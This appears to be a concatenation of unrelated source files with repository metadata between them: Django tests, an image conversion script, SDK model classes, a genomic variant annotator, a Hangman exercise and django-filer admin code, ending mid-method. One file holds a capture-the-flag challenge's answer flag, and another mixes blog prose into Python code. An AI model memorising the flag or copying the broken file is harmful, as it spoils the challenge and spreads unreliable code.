self.assertEqual(returned, 'email\ with_whitespace@d.com')
def test_empty_username(self):
self.assertRaisesMessage(ValueError,
'The given username must be set',
User.objects.create_user, username='')
class IsActiveTestCase(TestCase):
"""
Tests the behavior of the guaranteed is_active attribute
"""
@skipIfCustomUser
def test_builtin_user_isactive(self):
user = User.objects.create(username='foo', email='foo@bar.com')
# is_active is true by default
self.assertEqual(user.is_active, True)
user.is_active = False
user.save()
user_fetched = User.objects.get(pk=user.pk)
# the is_active flag is saved
self.assertFalse(user_fetched.is_active)
@override_settings(AUTH_USER_MODEL='auth.IsActiveTestUser1')
def test_is_active_field_default(self):
"""
tests that the default value for is_active is provided
"""
UserModel = get_user_model()
user = UserModel(username='foo')
self.assertEqual(user.is_active, True)
# you can set the attribute - but it will not save
user.is_active = False
# there should be no problem saving - but the attribute is not saved
user.save()
user_fetched = UserModel._default_manager.get(pk=user.pk)
# the attribute is always true for newly retrieved instance
self.assertEqual(user_fetched.is_active, True)
| 38.314685
| 80
| 0.697025
|
6fa53094c5cf524b80e3a68853f4b7244a63724a
| 2,090
|
py
|
Python
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 106
|
2020-06-18T17:52:29.000Z
|
2022-03-16T08:53:10.000Z
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 10
|
2020-06-23T14:17:48.000Z
|
2022-02-21T07:40:19.000Z
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 15
|
2020-07-14T07:01:12.000Z
|
2022-03-16T08:53:09.000Z
|
import os
import os.path
import sys
from multiprocessing import Pool
import cv2
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from data.util import bgr2ycbcr
from utils.progress_bar import ProgressBar
def main():
"""A multi-thread tool for converting RGB images to gary/Y images."""
input_folder = '/home/carraz/datasets/DIV2K800/DIV2K800'
save_folder = '/home/carraz/datasets/DIV2K800/DIV2K800_gray'
mode = 'gray' # 'gray' | 'y': Y channel in YCbCr space
compression_level = 3 # 3 is the default value in cv2
# CV_IMWRITE_PNG_COMPRESSION from 0 to 9. A higher value means a smaller size and longer
# compression time. If read raw images during training, use 0 for faster IO speed.
n_thread = 20 # thread number
if not os.path.exists(save_folder):
os.makedirs(save_folder)
print('mkdir [{:s}] ...'.format(save_folder))
else:
print('Folder [{:s}] already exists. Exit...'.format(save_folder))
sys.exit(1)
# print('Parent process {:d}.'.format(os.getpid()))
img_list = []
for root, _, file_list in sorted(os.walk(input_folder)):
path = [os.path.join(root, x) for x in file_list] # assume only images in the input_folder
img_list.extend(path)
def update(arg):
pbar.update(arg)
pbar = ProgressBar(len(img_list))
pool = Pool(n_thread)
for path in img_list:
pool.apply_async(worker, args=(path, save_folder, mode, compression_level), callback=update)
pool.close()
pool.join()
print('All subprocesses done.')
def worker(path, save_folder, mode, compression_level):
img_name = os.path.basename(path)
img = cv2.imread(path, cv2.IMREAD_UNCHANGED) # BGR
if mode == 'gray':
img_y = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
img_y = bgr2ycbcr(img, only_y=True)
cv2.imwrite(
os.path.join(save_folder, img_name), img_y,
[cv2.IMWRITE_PNG_COMPRESSION, compression_level])
return 'Processing {:s} ...'.format(img_name)
if __name__ == '__main__':
main()
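# Usage note: input_folder and save_folder are hardcoded above, so adjust
# them before invoking, e.g.
#     python codes/scripts/color2gray.py
# With mode = 'y' the worker calls bgr2ycbcr(img, only_y=True) to extract
# the luma channel instead of producing a plain cv2 grayscale image.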
| 32.65625
| 100
| 0.673684
|
48d27d31439c661311e94e74c4d9ad1bede43a11
| 5,051
|
py
|
Python
|
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2020-09-10T22:09:45.000Z
|
2021-12-24T17:00:07.000Z
|
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .update_build_pipeline_stage_details import UpdateBuildPipelineStageDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDeliverArtifactStageDetails(UpdateBuildPipelineStageDetails):
"""
Specifies the Deliver Artifacts stage.
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateDeliverArtifactStageDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.devops.models.UpdateDeliverArtifactStageDetails.build_pipeline_stage_type` attribute
of this class is ``DELIVER_ARTIFACT`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateDeliverArtifactStageDetails.
:type display_name: str
:param description:
The value to assign to the description property of this UpdateDeliverArtifactStageDetails.
:type description: str
:param build_pipeline_stage_type:
The value to assign to the build_pipeline_stage_type property of this UpdateDeliverArtifactStageDetails.
:type build_pipeline_stage_type: str
:param build_pipeline_stage_predecessor_collection:
The value to assign to the build_pipeline_stage_predecessor_collection property of this UpdateDeliverArtifactStageDetails.
:type build_pipeline_stage_predecessor_collection: oci.devops.models.BuildPipelineStagePredecessorCollection
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateDeliverArtifactStageDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this UpdateDeliverArtifactStageDetails.
:type defined_tags: dict(str, dict(str, object))
:param deliver_artifact_collection:
The value to assign to the deliver_artifact_collection property of this UpdateDeliverArtifactStageDetails.
:type deliver_artifact_collection: oci.devops.models.DeliverArtifactCollection
"""
self.swagger_types = {
'display_name': 'str',
'description': 'str',
'build_pipeline_stage_type': 'str',
'build_pipeline_stage_predecessor_collection': 'BuildPipelineStagePredecessorCollection',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'deliver_artifact_collection': 'DeliverArtifactCollection'
}
self.attribute_map = {
'display_name': 'displayName',
'description': 'description',
'build_pipeline_stage_type': 'buildPipelineStageType',
'build_pipeline_stage_predecessor_collection': 'buildPipelineStagePredecessorCollection',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'deliver_artifact_collection': 'deliverArtifactCollection'
}
self._display_name = None
self._description = None
self._build_pipeline_stage_type = None
self._build_pipeline_stage_predecessor_collection = None
self._freeform_tags = None
self._defined_tags = None
self._deliver_artifact_collection = None
self._build_pipeline_stage_type = 'DELIVER_ARTIFACT'
@property
def deliver_artifact_collection(self):
"""
Gets the deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:return: The deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:rtype: oci.devops.models.DeliverArtifactCollection
"""
return self._deliver_artifact_collection
@deliver_artifact_collection.setter
def deliver_artifact_collection(self, deliver_artifact_collection):
"""
Sets the deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:param deliver_artifact_collection: The deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:type: oci.devops.models.DeliverArtifactCollection
"""
self._deliver_artifact_collection = deliver_artifact_collection
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
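# A minimal construction sketch (values are hypothetical):
#
#     details = UpdateDeliverArtifactStageDetails(
#         display_name='deliver-stage',
#         description='Deliver build artifacts',
#     )
#     # build_pipeline_stage_type is pinned to 'DELIVER_ARTIFACT' by __init__
#     # and, per the class docstring, should not be changed.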
| 45.504505
| 245
| 0.724807
|
96ad4332e4d5d7537feb4b212ad4df304923520f
| 42
|
py
|
Python
|
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | 1
|
2021-11-20T04:13:07.000Z
|
2021-11-20T04:13:07.000Z
|
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
flag = "zjgsuctf{d3s_c4n_brUtef0rce!!!!}"
| 21
| 41
| 0.714286
|
424dc221d2f81a9d02b5ef6a5d7e4a3411dba666
| 10,525
|
py
|
Python
|
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import sys
import os.path
import time
import argparse
import pysam
from dae.genome import genome_access
from dae.genome.gene_models import load_gene_models
from dae.variant_annotation.annotator import (
VariantAnnotator as VariantAnnotation,
)
def cli_genome_options(parser):
genome_group = parser.add_argument_group("genome specification")
genome_group.add_argument(
"--gene-models-id",
"-T",
help="gene models ID <RefSeq, CCDS, knownGene>",
)
genome_group.add_argument(
"--gene-models-filename",
"--Traw",
help="outside gene models file path",
)
genome_group.add_argument(
"--gene-models-fileformat",
"--TrawFormat",
help="outside gene models format (refseq, ccds, knowngene)",
action="store",
)
genome_group.add_argument(
"--gene-mapping-filename",
"-I",
help="geneIDs mapping file",
default=None,
action="store",
)
genome_group.add_argument(
"--genome-id",
"-G",
help="genome ID <GATK_ResourceBundle_5777_b37_phiX174, hg19> ",
action="store",
)
genome_group.add_argument(
"--genome-filename",
"--Graw",
help="outside genome file name",
action="store",
)
genome_group.add_argument(
"--promoter-len",
"-P",
help="promoter length",
default=0,
type=int,
dest="promoter_len",
)
return parser
def parse_cli_genome_options(args):
genomic_sequence = None
gene_models = None
if args.gene_models_filename:
gene_models = load_gene_models(
args.gene_models_filename,
fileformat=args.gene_models_fileformat,
gene_mapping_file=args.gene_mapping_filename,
)
if args.genome_filename:
genomic_sequence = genome_access.open_ref(args.genome_filename)
if gene_models and genomic_sequence:
return genomic_sequence, gene_models
if genomic_sequence is None or gene_models is None:
from dae import GPFInstance
gpf = GPFInstance()
genome = gpf.genomes_db.get_genome(args.genome_id)
if genomic_sequence is None:
genomic_sequence = genome.get_genomic_sequence()
if gene_models is None:
gene_models = gpf.genomes_db.get_gene_models(
args.gene_models_id, args.genome_id
)
return genomic_sequence, gene_models
def cli_variants_options(parser):
location_group = parser.add_argument_group("variants location")
location_group.add_argument(
"--chrom", "-c", help="chromosome column number/name", action="store"
)
location_group.add_argument(
"--pos", "-p", help="position column number/name", action="store"
)
location_group.add_argument(
"--location",
"-x",
help="location (chr:pos) column number/name",
action="store",
)
variants_group = parser.add_argument_group("variants specification")
variants_group.add_argument(
"--variant", "-v", help="variant column number/name", action="store"
)
variants_group.add_argument(
"--ref",
"-r",
help="reference allele column number/name",
action="store",
)
variants_group.add_argument(
"--alt",
"-a",
help="alternative allele column number/name",
action="store",
)
parser.add_argument(
"--no-header",
"-H",
help="no header in the input file",
default=False,
action="store_true",
)
# variants_group.add_argument(
# "-t", help="type of mutation column number/name", action="store"
# )
# variants_group.add_argument(
# "-q", help="seq column number/name", action="store"
# )
# variants_group.add_argument(
# "-l", help="length column number/name", action="store"
# )
def parse_cli_variants_options(args):
columns = {}
if args.location is None:
if args.chrom is None and args.pos is None:
# default is location
columns["loc"] = "location"
else:
assert args.chrom is not None and args.pos is not None
columns["chrom"] = args.chrom
columns["position"] = args.pos
else:
assert args.chrom is None and args.pos is None
columns["loc"] = args.location
if args.variant is None:
if args.ref is None and args.alt is None:
# default is variant
columns["var"] = "variant"
else:
assert args.ref is not None and args.alt is not None
columns["ref"] = args.ref
columns["alt"] = args.alt
else:
assert args.ref is None and args.alt is None
columns["var"] = args.variant
return columns
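# Worked example of the branching above (hypothetical invocation): with
# `--chrom 1 --pos 2 --ref 4 --alt 5` the mapping returned is
#     {"chrom": "1", "position": "2", "ref": "4", "alt": "5"}
# while with no location/variant flags at all it falls back to the defaults
#     {"loc": "location", "var": "variant"}.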
def cli(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(
description="variants effect annotator",
conflict_handler="resolve",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
cli_genome_options(parser)
cli_variants_options(parser)
parser.add_argument(
"input_filename", nargs="?", help="input variants file name"
)
parser.add_argument(
"output_filename", nargs="?", help="output file name (default: stdout)"
)
args = parser.parse_args(argv)
genomic_sequence, gene_models = parse_cli_genome_options(args)
assert genomic_sequence is not None
assert gene_models is not None
annotator = VariantAnnotation(
genomic_sequence, gene_models, promoter_len=args.promoter_len
)
variant_columns = parse_cli_variants_options(args)
if args.input_filename == "-" or args.input_filename is None:
infile = sys.stdin
else:
assert os.path.exists(args.input_filename), args.input_filename
infile = open(args.input_filename, "r")
if args.output_filename is None:
outfile = sys.stdout
else:
outfile = open(args.output_filename, "w")
start = time.time()
header = None
if args.no_header:
for key, value in variant_columns.items():
variant_columns[key] = int(value)
else:
line = infile.readline().strip()
header = [c.strip() for c in line.split("\t")]
for key, value in variant_columns.items():
assert value in header
variant_columns[key] = header.index(value)
header.extend(["effectType", "effectGene", "effectDetails"])
print("\t".join(header), file=outfile)
counter = 0
for counter, line in enumerate(infile):
if line[0] == "#":
continue
columns = [c.strip() for c in line.split("\t")]
variant = {
key: columns[value] for key, value in variant_columns.items()
}
effects = annotator.do_annotate_variant(**variant)
desc = annotator.effect_description(effects)
columns.extend(desc)
print("\t".join(columns), file=outfile)
if (counter + 1) % 1000 == 0:
elapsed = time.time() - start
print(
f"processed {counter + 1} lines in {elapsed:0.2f} sec",
file=sys.stderr,
)
infile.close()
if args.output_filename:
outfile.close()
elapsed = time.time() - start
print(80 * "=", file=sys.stderr)
print(
f"DONE: {counter + 1} variants in {elapsed:0.2f} sec", file=sys.stderr,
)
print(80 * "=", file=sys.stderr)
def cli_vcf(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(
description="VCF variants effect annotator",
conflict_handler="resolve",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
cli_genome_options(parser)
parser.add_argument("input_filename", help="input VCF variants file name")
parser.add_argument(
"output_filename", nargs="?", help="output file name (default: stdout)"
)
args = parser.parse_args(argv)
genomic_sequence, gene_models = parse_cli_genome_options(args)
assert genomic_sequence is not None
assert gene_models is not None
annotator = VariantAnnotation(
genomic_sequence, gene_models, promoter_len=args.promoter_len
)
assert os.path.exists(args.input_filename), args.input_filename
infile = pysam.VariantFile(args.input_filename)
if args.output_filename is None:
outfile = sys.stdout
else:
outfile = open(args.output_filename, "w")
start = time.time()
# Transfer VCF header
header = infile.header
header.add_meta(
"variant_effect_annotation", "GPF variant effects annotation"
)
header.add_meta(
"variant_effect_annotation_command", '"{}"'.format(" ".join(sys.argv))
)
header.info.add("ET", ".", "String", "effected type")
header.info.add("EG", ".", "String", "effected gene")
header.info.add("ED", ".", "String", "effect details")
print(str(header), file=outfile, end="")
counter = 0
for counter, variant in enumerate(infile):
        effect_types = []
        effect_genes = []
        effect_details = []
for alt in variant.alts:
effects = annotator.do_annotate_variant(
chrom=variant.chrom,
position=variant.pos,
ref=variant.ref,
alt=alt,
)
et, eg, ed = annotator.effect_description(effects)
ed = ed.replace(";", "|")
effect_types.append(et)
effect_genes.append(eg)
effect_details.append(ed)
effect_types = ",".join(effect_types)
effect_genes = ",".join(effect_genes)
effect_details = ",".join(effect_details)
variant.info["ET"] = effect_types
variant.info["EG"] = eg
variant.info["ED"] = ed
print(str(variant), file=outfile, end="")
if (counter + 1) % 1000 == 0:
elapsed = time.time() - start
print(
f"processed {counter + 1} variants in {elapsed:0.2f} sec",
file=sys.stderr,
)
infile.close()
if args.output_filename:
outfile.close()
elapsed = time.time() - start
print(80 * "=", file=sys.stderr)
print(
f"DONE: {counter + 1} variants in {elapsed:0.2f} sec", file=sys.stderr,
)
print(80 * "=", file=sys.stderr)
if __name__ == "__main__":
cli(sys.argv[1:])
| 29.900568
| 79
| 0.607126
|
c696c522d62cbfb8f8fef3eae996f419cea1e93b
| 412
|
py
|
Python
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | 1
|
2019-11-22T19:29:39.000Z
|
2019-11-22T19:29:39.000Z
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | 1
|
2019-11-25T09:50:07.000Z
|
2021-07-15T07:05:28.000Z
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | null | null | null |
from django.db import models
from author.models import Author
from article.models import Article
class Bookmark(models.Model):
article = models.ForeignKey(Article, on_delete=models.CASCADE)
author = models.ForeignKey(Author, on_delete=models.CASCADE, related_name='bookmarks')
class Meta:
ordering = ('-pk',)
def __str__(self) -> str:
return f'{self.article} {self.author}'
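# A usage sketch (assumes existing Author and Article rows):
#
#     Bookmark.objects.create(author=some_author, article=some_article)
#     some_author.bookmarks.all()  # reverse accessor via related_name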
| 24.235294
| 90
| 0.711165
|
3362f023e362dc0dd981b5068d2ca97894eb5490
| 1,370
|
py
|
Python
|
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
# Game status categories
STATUS_WIN = 'win'
STATUS_LOSE = 'lose'
STATUS_ONGOING = 'ongoing'
class Hangman:
def __init__(self, word: str):
self.remaining_guesses = 9
self.status = STATUS_ONGOING
self.word = word
self.masked_word = '_' * len(word)
self.guesses: list = []
def guess(self, char: str):
if self.status != STATUS_ONGOING:
raise ValueError(f"The game has ended. You {self.status}.")
self._update_remaining_guesses(char)
self._update_masked_word(char)
self._update_status()
def _update_masked_word(self, char: str):
masked_chars = list(self.masked_word)
hits = [i for i, c in enumerate(self.word) if c == char]
for hit in hits:
masked_chars[hit] = char
self.masked_word = ''.join(masked_chars)
def _update_remaining_guesses(self, char: str):
if char not in self.word or char in self.guesses:
self.remaining_guesses -= 1
else:
self.guesses.append(char)
def _update_status(self):
if self.masked_word == self.word:
self.status = STATUS_WIN
elif self.remaining_guesses < 0:
self.status = STATUS_LOSE
def get_masked_word(self) -> str:
return self.masked_word
def get_status(self) -> str:
return self.status
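# A short usage sketch of the class above:
#
#     game = Hangman('foo')
#     game.guess('f')
#     game.guess('o')          # fills both 'o' positions in one guess
#     assert game.get_masked_word() == 'foo'
#     assert game.get_status() == STATUS_WIN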
| 29.782609
| 71
| 0.618248
|
e3bf0c084d6460b2f11931b21c6d2d21e7a4db76
| 6,175
|
py
|
Python
|
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | 1
|
2021-06-02T00:36:03.000Z
|
2021-06-02T00:36:03.000Z
|
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
#https://wakatime.com/blog/32-flask-part-1-sqlalchemy-models-to-json
import uuid
from datetime import datetime, timedelta

from flask import json
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.dialects.postgresql import UUID  # assumed column type for the UUID() usage below
from sqlalchemy.orm.attributes import QueryableAttribute
from wakatime_website import app
db = SQLAlchemy(app)
class BaseModel(db.Model):
__abstract__ = True
def to_dict(self, show=None, _hide=[], _path=None):
"""Return a dictionary representation of this model."""
show = show or []
hidden = self._hidden_fields if hasattr(self, "_hidden_fields") else []
default = self._default_fields if hasattr(self, "_default_fields") else []
default.extend(['id', 'modified_at', 'created_at'])
if not _path:
_path = self.__tablename__.lower()
def prepend_path(item):
item = item.lower()
if item.split(".", 1)[0] == _path:
return item
if len(item) == 0:
return item
if item[0] != ".":
item = ".%s" % item
item = "%s%s" % (_path, item)
return item
_hide[:] = [prepend_path(x) for x in _hide]
show[:] = [prepend_path(x) for x in show]
columns = self.__table__.columns.keys()
relationships = self.__mapper__.relationships.keys()
properties = dir(self)
ret_data = {}
for key in columns:
if key.startswith("_"):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
ret_data[key] = getattr(self, key)
for key in relationships:
if key.startswith("_"):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
_hide.append(check)
is_list = self.__mapper__.relationships[key].uselist
if is_list:
items = getattr(self, key)
if self.__mapper__.relationships[key].query_class is not None:
if hasattr(items, "all"):
items = items.all()
ret_data[key] = []
for item in items:
ret_data[key].append(
item.to_dict(
show=list(show),
_hide=list(_hide),
_path=("%s.%s" % (_path, key.lower())),
)
)
else:
if (
self.__mapper__.relationships[key].query_class is not None
or self.__mapper__.relationships[key].instrument_class
is not None
):
item = getattr(self, key)
if item is not None:
ret_data[key] = item.to_dict(
show=list(show),
_hide=list(_hide),
_path=("%s.%s" % (_path, key.lower())),
)
else:
ret_data[key] = None
else:
ret_data[key] = getattr(self, key)
for key in list(set(properties) - set(columns) - set(relationships)):
if key.startswith("_"):
continue
if not hasattr(self.__class__, key):
continue
attr = getattr(self.__class__, key)
if not (isinstance(attr, property) or isinstance(attr, QueryableAttribute)):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
val = getattr(self, key)
if hasattr(val, "to_dict"):
                    ret_data[key] = val.to_dict(
                        show=list(show),
                        _hide=list(_hide),
                        _path=("%s.%s" % (_path, key.lower())),
                    )
else:
try:
ret_data[key] = json.loads(json.dumps(val))
except:
pass
return ret_data
class User(BaseModel):
id = db.Column(UUID(), primary_key=True, default=uuid.uuid4)
    username = db.Column(db.String(), nullable=False, unique=True)
password = db.Column(db.String())
email_confirmed = db.Column(db.Boolean())
modified_at = db.Column(db.DateTime())
created_at = db.Column(db.DateTime(), nullable=False, default=datetime.utcnow)
_default_fields = [
"username",
"joined_recently",
]
_hidden_fields = [
"password",
]
_readonly_fields = [
"email_confirmed",
]
@property
def joined_recently(self):
return self.created_at > datetime.utcnow() - timedelta(days=3)
user = User(username="zzzeek")
db.session.add(user)
db.session.commit()
print(user.to_dict())
Which prints:
{
'id': UUID('488345de-88a1-4c87-9304-46a1a31c9414'),
'username': 'zzzeek',
'joined_recently': True,
'modified_at': None,
'created_at': datetime.datetime(2018, 7, 11, 6, 28, 56, 905379),
}
And is easily jsonified with:
json.dumps(user.to_dict())
customize which columns from User are included in the returned dictionary. For example, if you want to include email_confirmed in your serialized user you would do:
print(user.to_dict(show=['email_confirmed', 'password']))
Which prints:
{
'id': UUID('488345de-88a1-4c87-9304-46a1a31c9414'),
'username': 'zzzeek',
'email_confirmed': None,
'joined_recently': True,
'modified_at': None,
'created_at': datetime.datetime(2018, 7, 11, 6, 28, 56, 905379),
}
Also notice that password was not included, since it’s listed as hidden on User.
| 35.085227
| 164
| 0.508016
|
9ec84094526a13945cd7694c6984908a74159c69
| 770
|
py
|
Python
|
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | 2
|
2017-03-28T15:31:26.000Z
|
2018-08-16T22:15:18.000Z
|
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
from netapp.netapp_object import NetAppObject
class JobLogConfigModifyIterKeyTd(NetAppObject):
"""
Key typedef for table jm_admin_log
"""
_key_0 = None
@property
def key_0(self):
"""
Field module
"""
return self._key_0
@key_0.setter
def key_0(self, val):
if val != None:
self.validate('key_0', val)
self._key_0 = val
@staticmethod
def get_api_name():
return "job-log-config-modify-iter-key-td"
@staticmethod
def get_desired_attrs():
return [
'key-0',
]
def describe_properties(self):
return {
'key_0': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
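# A brief sketch of the generated accessor pattern (values hypothetical):
#
#     td = JobLogConfigModifyIterKeyTd()
#     td.key_0 = 'module-name'   # the setter runs validate() first
#     JobLogConfigModifyIterKeyTd.get_api_name()
#     # -> 'job-log-config-modify-iter-key-td'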
| 22
| 87
| 0.548052
|
044f320fe7d5b23da63d9a9c89e78f60acafc0cc
| 5,382
|
py
|
Python
|
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
from django import forms
from django.contrib.admin.utils import unquote
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from .. import settings
from ..models import File
from .permissions import PrimitivePermissionAwareModelAdmin
from .tools import AdminContext, admin_url_params_encoded, popup_status
class FileAdminChangeFrom(forms.ModelForm):
class Meta:
model = File
exclude = ()
class FileAdmin(PrimitivePermissionAwareModelAdmin):
list_display = ('label',)
list_per_page = 10
search_fields = ['name', 'original_filename', 'sha1', 'description']
raw_id_fields = ('owner',)
readonly_fields = ('sha1', 'display_canonical')
form = FileAdminChangeFrom
@classmethod
def build_fieldsets(cls, extra_main_fields=(), extra_advanced_fields=(),
extra_fieldsets=()):
fieldsets = (
(None, {
'fields': (
'name',
'owner',
'description',
) + extra_main_fields,
}),
(_('Advanced'), {
'fields': (
'file',
'sha1',
'display_canonical',
) + extra_advanced_fields,
'classes': ('collapse',),
}),
) + extra_fieldsets
if settings.FILER_ENABLE_PERMISSIONS:
fieldsets = fieldsets + (
(None, {
'fields': ('is_public',)
}),
)
return fieldsets
def response_change(self, request, obj):
"""
Overrides the default to be able to forward to the directory listing
instead of the default change_list_view
"""
if (
request.POST
and '_continue' not in request.POST
and '_saveasnew' not in request.POST
and '_addanother' not in request.POST
):
# Popup in pick mode or normal mode. In both cases we want to go
# back to the folder list view after save. And not the useless file
# list view.
if obj.folder:
url = reverse('admin:filer-directory_listing',
kwargs={'folder_id': obj.folder.id})
else:
url = reverse(
'admin:filer-directory_listing-unfiled_images')
url = "{}{}".format(
url,
admin_url_params_encoded(request),
)
return HttpResponseRedirect(url)
return super().response_change(request, obj)
def render_change_form(self, request, context, add=False, change=False,
form_url='', obj=None):
info = self.model._meta.app_label, self.model._meta.model_name
extra_context = {'show_delete': True,
'history_url': 'admin:%s_%s_history' % info,
'is_popup': popup_status(request),
'filer_admin_context': AdminContext(request)}
context.update(extra_context)
return super().render_change_form(
request=request, context=context, add=add, change=change,
form_url=form_url, obj=obj)
def delete_view(self, request, object_id, extra_context=None):
"""
Overrides the default to enable redirecting to the directory view after
deletion of a image.
we need to fetch the object and find out who the parent is
before super, because super will delete the object and make it
impossible to find out the parent folder to redirect to.
"""
try:
obj = self.get_queryset(request).get(pk=unquote(object_id))
parent_folder = obj.folder
except self.model.DoesNotExist:
parent_folder = None
if request.POST:
# Return to folder listing, since there is no usable file listing.
super().delete_view(
request=request, object_id=object_id,
extra_context=extra_context)
if parent_folder:
url = reverse('admin:filer-directory_listing',
kwargs={'folder_id': parent_folder.id})
else:
url = reverse('admin:filer-directory_listing-unfiled_images')
url = "{}{}".format(
url,
admin_url_params_encoded(request)
)
return HttpResponseRedirect(url)
return super().delete_view(
request=request, object_id=object_id,
extra_context=extra_context)
def get_model_perms(self, request):
"""
It seems this is only used for the list view. NICE :-)
"""
return {
'add': False,
'change': False,
'delete': False,
}
def display_canonical(self, instance):
canonical = instance.canonical_url
if canonical:
return mark_safe(f'<a href="{canonical}">{canonical}</a>')
else:
